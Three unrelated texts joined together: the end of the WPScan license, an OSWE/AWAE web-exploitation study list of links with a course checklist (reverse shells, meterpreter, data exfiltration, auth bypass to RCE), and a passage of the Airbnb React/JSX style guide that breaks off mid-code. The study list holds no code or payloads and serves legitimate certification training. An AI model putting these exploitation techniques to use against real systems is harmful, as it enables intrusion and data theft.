Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an โ€œas isโ€ basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# oswe_preparation ## Curated List The following Links are curated from Below Sources. | Name | URL | | ------ | ------ | | M507 | [Github](https://github.com/M507/AWAE-Preparation/) | | Z-r0crypt OSWE/AWAE Preparation | [Blog](https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/) | | AWAE - OSWE Preparation / Resources | [Gitbook](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/) | | HTB and Vulnhub: An OSWE Approach | [Blog](https://klezvirus.github.io/Misc/HTB-VH-OSWE/) | # reading # oswe_preparation # Advanced Web Attacks & Exploitation All efforts for the AWAE course and preparation for the Offensive Security Web Expert (OSWE) exam. ## To Read ## Cross-Site Scripting: * [ ] https://xhr.spec.whatwg.org/ ## Session Hijacking * [ ] https://popped.io/hijacking-sessions-using-socat/ * [ ] https://pentesterlab.com/exercises/xss_and_mysql_file/course ## Persistent Cross-Site Scripting * [ ] https://www.acunetix.com/blog/articles/persistent-xss/ * [ ] https://portswigger.net/web-security/cross-site-scripting ## Cross-Site Request Forgery * [ ] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html * [ ] XSS and MySQL * [ ] https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ ## Bypassing File Upload Restrictions: * [ ] https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf * [ ] http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html * [ ] https://www.owasp.org/index.php/Unrestricted_File_Upload * [ ] Popcorn machine from HackTheBox * [ ] Vault machine from HackTheBox * [ ] [[Paper] File Upload Restrictions Bypass](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) * [ ] [Shell the web - Methods of a Ninja](http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html) * [ ] [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) * [ ] [Atlassian Crowd Pre-auth RCE](https://www.corben.io/atlassian-crowd-rce/) * [ ] [Popcorn machine from HackTheBox](https://www.youtube.com/watch?v=NMGsnPSm8iw) * [ ] [Vault machine from HackTheBox](https://www.youtube.com/watch?v=LfbwlPxToBc) ## Websocekts InSecurity * [ ] [Introduction to WebSockets](https://portswigger.net/web-security/websockets) * [ ] [[Video] Hacking with Websocket - BlackHat](https://www.youtube.com/watch?v=-ALjHUqSz_Y) * [ ] [Remote Hardware takeover via Websocket Hijacking](https://www.netsparker.com/blog/web-security/remote-hardware-takeover-via-vulnerable-admin-software/) * [ ] [Cross-Site WebSocket Hijacking to full Session Compromise](https://www.notsosecure.com/how-cross-site-websocket-hijacking-could-lead-to-full-session-compromise/) ## Source Code Audit * [ ] [Introduction to Code Review [PentesterLab]](https://pentesterlab.com/exercises/codereview/course) * [ ] [Static code analysis writeups](https://shells.systems/category/static-code-analysis/) * [ ] [TrendMicro - Secure Coding Dojo](https://trendmicro.github.io/SecureCodingDojo/codereview101/) * [ ] [Bug Hunting with Static Code Analysis [Video]](https://www.youtube.com/watch?v=Sb011qfbMkQ) * [ ] [Shopify Remote Code Execution - Hackerone](https://prakhar.prasad.pro/blog/shopify-remote-code-execution/) * [ ] [Finding vulnerabilities in source code ( APS.NET)](https://hydrasky.com/network-security/finding-vulnerabilities-in-source-code-aps-net/) * [ ] [A deep dive into ASP.NET Deserialization](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) * [ ] [Writeups by mr\_me](https://srcincite.io/blog/) ## PHP Type Juggling: * [ ] https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf * [ ] https://medium.com/@Q2hpY2tlblB3bnk/php-type-juggling-c34a10630b10 * [ ] https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/ * [ ] https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/ * [ ] http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html * [ ] https://www.netsparker.com/blog/web-security/type-juggling-authentication-bypass-cms-made-simple/ * [ ] https://www.php.net/manual/en/types.comparisons.php * [ ] https://github.com/spaze/hashes * [ ] https://www.whitehatsec.com/blog/magic-hashes/ * [ ] Falafel machine from HackTheBox * [ ] [OWASP - PHPMagicTricks TypeJuggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) * [ ] [PHP Type Juggling - Introduction](https://medium.com/@Q2hpY2tlblB3bnk/php-type-juggling-c34a10630b10) * [ ] [Type Juggling, PHP Object Injection, SQLi](https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/) * [ ] [Writing Exploits For PHP Type Juggling](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) * [ ] [Type Juggling Authentication Bypass Vulnerability in CMS Made Simple](https://www.netsparker.com/blog/web-security/type-juggling-authentication-bypass-cms-made-simple/) * [ ] [PHP Magic Hashes](https://www.whitehatsec.com/blog/magic-hashes/) * [ ] [Detailed Explanation of PHP Type Juggling Vulnerabilities](https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/) * [ ] [[Video] PHP Type Juggling Vulnerabilities, Netsparker](https://www.youtube.com/watch?v=ASYuK01H3Po) * [ ] [[Video] Falafel machine from HackTheBox](https://www.youtube.com/watch?v=CUbWpteTfio) ## JavaScript Injection: * [ ] https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html * [ ] https://capacitorset.github.io/mathjs/ * [ ] [Server Side JS Injection](https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html) * [ ] [Remote Code Execution in math.js](https://capacitorset.github.io/mathjs/) * [ ] [Arbitrary code execution in fast-redact](https://itnext.io/how-i-exploited-a-remote-code-execution-vulnerability-in-fast-redact-9e69fa35572f) * [ ] [NVIDIA GeForce Experience OS Command Injection - CVE-2019-5678](https://rhinosecuritylabs.com/application-security/nvidia-rce-cve-2019-5678/) * [ ] [SetTimeout and SetInterval use eval therefore are evil](https://idiallo.com/javascript/settimeout-and-setinterval-and-setevil) * [ ] [Pentesting Node.js Application : Nodejs Application Security](https://www.websecgeeks.com/2017/04/pentesting-nodejs-application-nodejs.html) * [ ] [NodeJS remote debugging with vscode](https://maikthulhu.github.io/2019-05-17-remote-debugging-node-vscode/) * [ ] [Escape NodeJS Sandboxes](https://blog.netspi.com/escape-nodejs-sandboxes/) ## NodeJS: * [ ] https://maikthulhu.github.io/2019-05-17-remote-debugging-node-vscode/ * [ ] https://github.com/ajinabraham/Node.Js-Security-Course * [ ] https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ * [ ] https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/ * [ ] Celestial machine from HackTheBox ## SQLi: * [ ] [RCE with SQL Injection - MSSQL](https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e) * [ ] [SQL Injection to LFI to RCE - MySQL](https://medium.com/bugbountywriteup/sql-injection-to-lfi-to-rce-536bed29a862) * [ ] [From SQLi to SHELL (I and II) - PentesterLab](https://pentesterlab.com/exercises/from_sqli_to_shell_II/course) * [ ] [Pre-Auth Takeover of OXID eShops](https://blog.ripstech.com/2019/oxid-esales-shop-software/) * [ ] [Blind SQL Injection](https://www.acunetix.com/websitesecurity/blind-sql-injection/) * [ ] [[Paper] PostgreSQL Injection](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf) * [ ] [Having Fun With PostgreSQL](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt) * [ ] [Blind Postgresql Sql Injection Tutorial](https://dotcppfile.wordpress.com/2014/07/12/blind-postgresql-sql-injection-tutorial/) * [ ] [SQL Injection Cheat Sheet - PentestMonkey](http://pentestmonkey.net/category/cheat-sheet/sql-injection) * [ ] [SQL Injection Cheat Sheet - PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) * [ ] [Exploiting H2 SQL injection to RCE](https://blog.ripstech.com/2019/dotcms515-sqli-to-rce/) \ * [ ] https://pentesterlab.com/exercises/from_sqli_to_shell/course * [ ] https://www.acunetix.com/websitesecurity/blind-sql-injection/ ## PostgreSQL * [ ] http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet * [ ] http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt * [ ] https://www.exploit-db.com/papers/13084 * [ ] http://www.postgresqltutorial.com/postgresql-string-functions/ * [ ] https://www.linuxtopia.org/online_books/database_guides/Practical_PostgreSQL_database/c7547_002.htm * [ ] https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf * [ ] https://dotcppfile.wordpress.com/2014/07/12/blind-postgresql-sql-injection-tutorial/ ## XML External Entity (XXE) Attack * [ ] [A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) * [ ] [From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/) * [ ] [Blind XXE to RCE](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce) * [ ] [Apache Flex BlazeDS XXE Vulnerabilty](https://codewhitesec.blogspot.com/2015/08/cve-2015-3269-apache-flex-blazeds-xxe.html) * [ ] [WebLogic EJBTaglibDescriptor XXE](https://medium.com/@knownsec404team/weblogic-ejbtaglibdescriptor-xxe-vulnerability-analysis-cve-2019-2888-bd649f5fcfa6) ## Server Side Template Injection (SSTI) * [ ] [[Portswigger Research] Server Side Template Injection](https://portswigger.net/research/server-side-template-injection) * [ ] [[Video] SSTI : RCE For The Modern Web App - albinowax](https://www.youtube.com/watch?v=3cT0uE7Y87s) * [ ] [Server Side Template Injection](https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34) * [ ] [Jinja2 template injection filter bypasses](https://0day.work/jinja2-template-injection-filter-bypasses/) * [ ] [Exploitation of Server Side Template Injection with Craft CMS plugin SEOmatic \<=3.1.3](http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/) ## Long Readings: * [ ] Use of Deserialization in .NET Framework Methods and Classes.ย https://www.nccgroup.trust/globalassets/our-research/uk/images/whitepaper-new.pdf * [ ] https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf ## Password Reset Vulnerability * [ ] [Testing Password rest functionalities](http://imranparay.blogspot.com/2018/09/testing-password-reset-functionalities.html) * [ ] [OWASP - Forgot Password Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html) * [ ] [How we hacked multiple user accounts using weak reset tokens for passwords](https://blog.appsecco.com/mass-account-pwning-or-how-we-hacked-multiple-user-accounts-using-weak-reset-tokens-for-passwords-c2d6c0831377) # OSWE Lab Machine Based #### Authentication Bypass to RCE * [ ] [ATutor 2.2.1 Authentication Bypass](https://rebraws.github.io/ATutorAuthBypass/) * [ ] [ATutor LMS password\_reminder TOCTOU Authentication Bypass](https://srcincite.io/advisories/src-2016-0009/) * [ ] [ATutor 2.2.1 - Directory Traversal / Remote Code Execution](https://www.exploit-db.com/exploits/39639) * [ ] [Cubecart Admin Authentication Bypass](https://blog.ripstech.com/2018/cubecart-admin-authentication-bypass/) * [ ] [Trendmicro smart protection bypass to RCE](https://underdefense.com/n-day-exploit-development-and-upgrade-to-rce/) #### XSS to RCE * [ ] [AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting](https://www.exploit-db.com/exploits/20009) * [ ] [Chaining XSS, CSRF to achieve RCE](https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/) * [ ] [Code analysis to gaining RCE](https://sarthaksaini.com/2019/awae/xss-rce.html) * [ ] [Magento 2.3.1: Unauthenticated Stored XSS to RCE](https://blog.ripstech.com/2019/magento-rce-via-xss/) * [ ] [Mybb 18.20 From Stored XSS to RCE](https://medium.com/@knownsec404team/the-analysis-of-mybb-18-20-from-stored-xss-to-rce-7234d7cc0e72) # oswe_preparation # Advanced Web Attacks & Exploitation All efforts for the AWAE course and preparation for the Offensive Security Web Expert (OSWE) exam. ## Study Strategy ## Course Completion Taken from publicly-available syllabus. * [ ] 1. Introduction * [ ] Videos * [ ] Read/Notes * [ ] 2. Tools & Methodologies * [ ] Videos * [ ] Read/Notes * [ ] 2.1.5 Exercise - Web Inspection * [ ] 2.2.1 Exercise - Python Requests * [ ] 2.3.3 Exercise - Decompilation * [ ] 3. Atmail Mail Server Appliance: from XSS to RCE * [X] Videos * [X] Read/Notes * [X] 3.3.1 Exercise - Vuln Discovery * [X] 3.4.1 Exercise - Session Hijack * [X] 3.5.4 Exercise - Session Riding * [X] 3.5.5 Extra Mile - Session Riding * [X] 3.6.5 Exercise - globalsaveAction Vuln Analysis * [X] 3.6.7 Exercise - Make it fully automagical * [X] 3.6.8 Extra Mile * [ ] 3.6.8 Extra Mile - Also see if you can background it completely * [ ] 4. ATutor Auth Bypass and RCE * [ ] Videos * [ ] Read/Notes * [ ] 4.3.1 Exercise - Vuln Discovery * [ ] 4.6.3 Exercise - Data Exfil * [ ] 4.6.4 Extra Mile - Data Exfil * [ ] 4.7.1 Exercise - ATutor Auth * [ ] 4.7.2 Extra Mile - ATutor Auth * [ ] 4.8.1 Exercise - ATutor Auth * [ ] 4.8.2 Extra Mile - ATutor Auth * [ ] 4.9.1 Exercise - File Upload * [ ] 4.10.5 Exercise - RCE * [ ] 4.10.6 Extra Mile - RCE * [ ] 5. ATutor LMS Type Juggling Vuln * [ ] Videos * [ ] Read/Notes * [ ] 5.4.1 Exercise - String Conversion * [ ] 5.6.3 Exercise - Loose Comparison * [ ] 5.6.4 Extra Mile - Loose Comparison * [ ] 6. ManageEngine Applications Manager AMUserResourcesSyncServlet SQL Injection RCE * [X] Videos * [X] Read/Notes * [X] 6.3.6 Exercise - Vuln Discovery * [X] 6.5.1 Exercise - Blind Bats * [X] 6.6.1 Exercise - Access FS * [ ] 6.6.3 Exercise - VBS file [!! Need to do the batch! Got the reverse shell... !!] * [ ] 6.6.4 Extra Mile - Shell via JSP * [X] 6.7.4 Exercise - PostgreSQL Extensions * [ ] 6.8.1 Exercise - UDF Reverse Shell * [ ] 6.9.3 Exercise - Moar Shells * [ ] 6.9.4 Extra Mile - Moar Shells * [ ] 7. Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability * [ ] Videos * [ ] Read/Notes * [ ] 7.6.1 Exercise - RevShell * [ ] 7.6.2 Extra Mile - RevShell * [ ] 8. DotNetNuke Deserialization RCE * [ ] Videos * [ ] Read/Notes * [ ] 8.4.3 Exercise - Serialization Basics * [ ] 8.4.5 Exercise - Serialization Basics * [ ] 8.4.7 Exercise - Serialization Basics * [ ] 8.5.3 Exercise - DNN Vuln Analysis * [ ] 8.6.4 Exercise - Payload Options * [ ] 8.6.7 Exercise - Payload Options * [ ] 8.7.1 Exercise - Payload Options * [ ] 8.8.1 Extra Mile - Y SO SERIAL? .NET * [ ] 8.8.2 Extra Mile - Y SO SERIAL? Java * [ ] 9. ERPNext Authentication Bypass and Server Side Template Injection * [X] Videos * [X] Read/Notes * [X] 9.1.1.1 Exercise - Configure Kali SMTPd server * [X] 9.1.2.1 Exercise - Configure remote debugging * [X] 9.1.3.1 Exercise - Configure MariaDB logging * [ ] 9.2.3.2 Exercise - Find whitelisted functions * [X] 9.3.1.2 Exercises - SQLi * [X] 9.4.2.1 Exercises - Access the admin acct * [X] 9.5.2.1 Exercise - Find the SSTI * [ ] 9.5.2.2 Extra Mile - Find another instance of SSTI * [X] 9.5.3.1 Exercise - Recreate the `__class__` rendering * [ ] 9.5.3.2 Extra Mile - Alternative filter bypass * [X] 9.6.1.1 Exercises - Recreate the filter bypass and exploit and find other classes to own * [X] 9.6.2.1 Exercises - Recreate RCE and get shell * [ ] 9.6.2.2 Extra Mile - Get output to display * [ ] 10. openCRX Authentication Bypass and Remote Code Execution * [X] Videos * [X] Read/Notes * [X] 10.2.1.1 Exercise - Recreate the Rando and SecureRando * [X] 10.2.4.1 Exercise - Generate a token list * [X] 10.2.4.2 Extra Mile - Update token program to take start/stop * [X] 10.2.5.2 Exercises - Reset password * [X] 10.2.5.3 Extra Mile - Automate the attack chain * [X] 10.3.6.2 Exercises - Recreate the XXE attack * [X] 10.3.6.3 Extra Mile - Script to parse XXE results * [X] 10.3.8.1 Exercise - Implement the "wrapper" payload * [X] 10.3.9.2 Exercise - Connect to HSQLDB * [X] 10.4.1.1 Exercises - Write file and confirm * [X] 10.4.2.1 Exercise - Find dir with JSP files * [X] 10.4.3.1 Exercises - Get. That. Shell. * [ ] 11. openITCOCKPITXSSandOSCommandInjection - Blackbox * [ ] Videos * [ ] Read/Notes * [ ] 11.5.1 Exercise - Recreate the XSS * [ ] 11.6.2.1 Exercises - DOM rewrite * [ ] 11.6.2.2 Extra Mile - Prevent new page load * [ ] 11.6.3.1 Exercises - Finish the script and initialize the DB * [ ] 11.6.4.1 Exercises - Finish the API script and get a fake login page with the XSS * [ ] 11.6.4.2 Extra Mile - Add cookie functionality * [ ] 11.6.5.1 Exercises - Exploit the XSS * [ ] 11.6.5.2 Extra Miles - Beef up dat XSS * [ ] 11.6.6.1 Exercise - Dump the SQLite DB * [ ] 11.7.4.1 Exercise - Fuzz and find cmds * [ ] 11.7.5.1 Exercise - Test cmd injection * [ ] 11.7.6.1 Exercise - Get a meterpreter shell * [ ] 10.7.7 Extra Mile - Get RCE via administrator session
# Airbnb React/JSX Style Guide *A mostly reasonable approach to React and JSX* This style guide is mostly based on the standards that are currently prevalent in JavaScript, although some conventions (i.e async/await or static class fields) may still be included or prohibited on a case-by-case basis. Currently, anything prior to stage 3 is not included nor recommended in this guide. ## Table of Contents 1. [Basic Rules](#basic-rules) 1. [Class vs `React.createClass` vs stateless](#class-vs-reactcreateclass-vs-stateless) 1. [Mixins](#mixins) 1. [Naming](#naming) 1. [Declaration](#declaration) 1. [Alignment](#alignment) 1. [Quotes](#quotes) 1. [Spacing](#spacing) 1. [Props](#props) 1. [Refs](#refs) 1. [Parentheses](#parentheses) 1. [Tags](#tags) 1. [Methods](#methods) 1. [Ordering](#ordering) 1. [`isMounted`](#ismounted) ## Basic Rules - Only include one React component per file. - However, multiple [Stateless, or Pure, Components](https://facebook.github.io/react/docs/reusable-components.html#stateless-functions) are allowed per file. eslint: [`react/no-multi-comp`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/no-multi-comp.md#ignorestateless). - Always use JSX syntax. - Do not use `React.createElement` unless youโ€™re initializing the app from a file that is not JSX. - [`react/forbid-prop-types`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/forbid-prop-types.md) will allow `arrays` and `objects` only if it is explicitly noted what `array` and `object` contains, using `arrayOf`, `objectOf`, or `shape`. ## Class vs `React.createClass` vs stateless - If you have internal state and/or refs, prefer `class extends React.Component` over `React.createClass`. eslint: [`react/prefer-es6-class`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/prefer-es6-class.md) [`react/prefer-stateless-function`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/prefer-stateless-function.md) ```jsx // bad const Listing = React.createClass({ // ... render() { return <div>{this.state.hello}</div>; } }); // good class Listing extends React.Component { // ... render() { return <div>{this.state.hello}</div>; } } ``` And if you donโ€™t have state or refs, prefer normal functions (not arrow functions) over classes: ```jsx // bad class Listing extends React.Component { render() { return <div>{this.props.hello}</div>; } } // bad (relying on function name inference is discouraged) const Listing = ({ hello }) => ( <div>{hello}</div> ); // good function Listing({ hello }) { return <div>{hello}</div>; } ``` ## Mixins - [Do not use mixins](https://facebook.github.io/react/blog/2016/07/13/mixins-considered-harmful.html). > Why? Mixins introduce implicit dependencies, cause name clashes, and cause snowballing complexity. Most use cases for mixins can be accomplished in better ways via components, higher-order components, or utility modules. ## Naming - **Extensions**: Use `.jsx` extension for React components. eslint: [`react/jsx-filename-extension`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-filename-extension.md) - **Filename**: Use PascalCase for filenames. E.g., `ReservationCard.jsx`. - **Reference Naming**: Use PascalCase for React components and camelCase for their instances. eslint: [`react/jsx-pascal-case`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-pascal-case.md) ```jsx // bad import reservationCard from './ReservationCard'; // good import ReservationCard from './ReservationCard'; // bad const ReservationItem = <ReservationCard />; // good const reservationItem = <ReservationCard />; ``` - **Component Naming**: Use the filename as the component name. For example, `ReservationCard.jsx` should have a reference name of `ReservationCard`. However, for root components of a directory, use `index.jsx` as the filename and use the directory name as the component name: ```jsx // bad import Footer from './Footer/Footer'; // bad import Footer from './Footer/index'; // good import Footer from './Footer'; ``` - **Higher-order Component Naming**: Use a composite of the higher-order componentโ€™s name and the passed-in componentโ€™s name as the `displayName` on the generated component. For example, the higher-order component `withFoo()`, when passed a component `Bar` should produce a component with a `displayName` of `withFoo(Bar)`. > Why? A componentโ€™s `displayName` may be used by developer tools or in error messages, and having a value that clearly expresses this relationship helps people understand what is happening. ```jsx // bad export default function withFoo(WrappedComponent) { return function WithFoo(props) { return <WrappedComponent {...props} foo />; } } // good export default function withFoo(WrappedComponent) { function WithFoo(props) { return <WrappedComponent {...props} foo />; } const wrappedComponentName = WrappedComponent.displayName || WrappedComponent.name || 'Component'; WithFoo.displayName = `withFoo(${wrappedComponentName})`; return WithFoo; } ``` - **Props Naming**: Avoid using DOM component prop names for different purposes. > Why? People expect props like `style` and `className` to mean one specific thing. Varying this API for a subset of your app makes the code less readable and less maintainable, and may cause bugs. ```jsx // bad <MyComponent style="fancy" /> // bad <MyComponent className="fancy" /> // good <MyComponent variant="fancy" /> ``` ## Declaration - Do not use `displayName` for naming components. Instead, name the component by reference. ```jsx // bad export default React.createClass({ displayName: 'ReservationCard', // stuff goes here }); // good export default class ReservationCard extends React.Component { } ``` ## Alignment - Follow these alignment styles for JSX syntax. eslint: [`react/jsx-closing-bracket-location`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-closing-bracket-location.md) [`react/jsx-closing-tag-location`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-closing-tag-location.md) ```jsx // bad <Foo superLongParam="bar" anotherSuperLongParam="baz" /> // good <Foo superLongParam="bar" anotherSuperLongParam="baz" /> // if props fit in one line then keep it on the same line <Foo bar="bar" /> // children get indented normally <Foo superLongParam="bar" anotherSuperLongParam="baz" > <Quux /> </Foo> // bad {showButton && <Button /> } // bad { showButton && <Button /> } // good {showButton && ( <Button /> )} // good {showButton && <Button />} // good {someReallyLongConditional && anotherLongConditional && ( <Foo superLongParam="bar" anotherSuperLongParam="baz" /> ) } // good {someConditional ? ( <Foo /> ) : ( <Foo superLongParam="bar" anotherSuperLongParam="baz" /> )} ``` ## Quotes - Always use double quotes (`"`) for JSX attributes, but single quotes (`'`) for all other JS. eslint: [`jsx-quotes`](https://eslint.org/docs/rules/jsx-quotes) > Why? Regular HTML attributes also typically use double quotes instead of single, so JSX attributes mirror this convention. ```jsx // bad <Foo bar='bar' /> // good <Foo bar="bar" /> // bad <Foo style={{ left: "20px" }} /> // good <Foo style={{ left: '20px' }} /> ``` ## Spacing - Always include a single space in your self-closing tag. eslint: [`no-multi-spaces`](https://eslint.org/docs/rules/no-multi-spaces), [`react/jsx-tag-spacing`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-tag-spacing.md) ```jsx // bad <Foo/> // very bad <Foo /> // bad <Foo /> // good <Foo /> ``` - Do not pad JSX curly braces with spaces. eslint: [`react/jsx-curly-spacing`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-curly-spacing.md) ```jsx // bad <Foo bar={ baz } /> // good <Foo bar={baz} /> ``` ## Props - Always use camelCase for prop names, or PascalCase if the prop value is a React component. ```jsx // bad <Foo UserName="hello" phone_number={12345678} /> // good <Foo userName="hello" phoneNumber={12345678} Component={SomeComponent} /> ``` - Omit the value of the prop when it is explicitly `true`. eslint: [`react/jsx-boolean-value`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-boolean-value.md) ```jsx // bad <Foo hidden={true} /> // good <Foo hidden /> // good <Foo hidden /> ``` - Always include an `alt` prop on `<img>` tags. If the image is presentational, `alt` can be an empty string or the `<img>` must have `role="presentation"`. eslint: [`jsx-a11y/alt-text`](https://github.com/jsx-eslint/eslint-plugin-jsx-a11y/blob/master/docs/rules/alt-text.md) ```jsx // bad <img src="hello.jpg" /> // good <img src="hello.jpg" alt="Me waving hello" /> // good <img src="hello.jpg" alt="" /> // good <img src="hello.jpg" role="presentation" /> ``` - Do not use words like "image", "photo", or "picture" in `<img>` `alt` props. eslint: [`jsx-a11y/img-redundant-alt`](https://github.com/jsx-eslint/eslint-plugin-jsx-a11y/blob/master/docs/rules/img-redundant-alt.md) > Why? Screenreaders already announce `img` elements as images, so there is no need to include this information in the alt text. ```jsx // bad <img src="hello.jpg" alt="Picture of me waving hello" /> // good <img src="hello.jpg" alt="Me waving hello" /> ``` - Use only valid, non-abstract [ARIA roles](https://www.w3.org/TR/wai-aria/#usage_intro). eslint: [`jsx-a11y/aria-role`](https://github.com/jsx-eslint/eslint-plugin-jsx-a11y/blob/master/docs/rules/aria-role.md) ```jsx // bad - not an ARIA role <div role="datepicker" /> // bad - abstract ARIA role <div role="range" /> // good <div role="button" /> ``` - Do not use `accessKey` on elements. eslint: [`jsx-a11y/no-access-key`](https://github.com/jsx-eslint/eslint-plugin-jsx-a11y/blob/master/docs/rules/no-access-key.md) > Why? Inconsistencies between keyboard shortcuts and keyboard commands used by people using screenreaders and keyboards complicate accessibility. ```jsx // bad <div accessKey="h" /> // good <div /> ``` - Avoid using an array index as `key` prop, prefer a stable ID. eslint: [`react/no-array-index-key`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/no-array-index-key.md) > Why? Not using a stable ID [is an anti-pattern](https://medium.com/@robinpokorny/index-as-a-key-is-an-anti-pattern-e0349aece318) because it can negatively impact performance and cause issues with component state. We donโ€™t recommend using indexes for keys if the order of items may change. ```jsx // bad {todos.map((todo, index) => <Todo {...todo} key={index} /> )} // good {todos.map(todo => ( <Todo {...todo} key={todo.id} /> ))} ``` - Always define explicit defaultProps for all non-required props. > Why? propTypes are a form of documentation, and providing defaultProps means the reader of your code doesnโ€™t have to assume as much. In addition, it can mean that your code can omit certain type checks. ```jsx // bad function SFC({ foo, bar, children }) { return <div>{foo}{bar}{children}</div>; } SFC.propTypes = { foo: PropTypes.number.isRequired, bar: PropTypes.string, children: PropTypes.node, }; // good function SFC({ foo, bar, children }) { return <div>{foo}{bar}{children}</div>; } SFC.propTypes = { foo: PropTypes.number.isRequired, bar: PropTypes.string, children: PropTypes.node, }; SFC.defaultProps = { bar: '', children: null, }; ``` - Use spread props sparingly. > Why? Otherwise youโ€™re more likely to pass unnecessary props down to components. And for React v15.6.1 and older, you could [pass invalid HTML attributes to the DOM](https://reactjs.org/blog/2017/09/08/dom-attributes-in-react-16.html). Exceptions: - HOCs that proxy down props and hoist propTypes ```jsx function HOC(WrappedComponent) { return class Proxy extends React.Component { Proxy.propTypes = { text: PropTypes.string, isLoading: PropTypes.bool }; render() { return <WrappedComponent {...this.props} /> } } } ``` - Spreading objects with known, explicit props. This can be particularly useful when testing React components with Mochaโ€™s beforeEach construct. ```jsx export default function Foo { const props = { text: '', isPublished: false } return (<div {...props} />); } ``` Notes for use: Filter out unnecessary props when possible. Also, use [prop-types-exact](https://www.npmjs.com/package/prop-types-exact) to help prevent bugs. ```jsx // bad render() { const { irrelevantProp, ...relevantProps } = this.props; return <WrappedComponent {...this.props} /> } // good render() { const { irrelevantProp, ...relevantProps } = this.props; return <WrappedComponent {...relevantProps} /> } ``` ## Refs - Always use ref callbacks. eslint: [`react/no-string-refs`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/no-string-refs.md) ```jsx // bad <Foo ref="myRef" /> // good <Foo ref={(ref) => { this.myRef = ref; }} /> ``` ## Parentheses - Wrap JSX tags in parentheses when they span more than one line. eslint: [`react/jsx-wrap-multilines`](https://github.com/jsx-eslint/eslint-plugin-react/blob/master/docs/rules/jsx-wrap-multilines.md) ```jsx // bad render() { return <MyComponent variant="long body" foo="bar"> <MyChild /> </MyComponent>; } // good render() { return ( <MyComponent variant="long body" foo="bar"> <MyChild /> </MyComponent> ); } // good, when single line render() { const body = <div>hello</div>; return 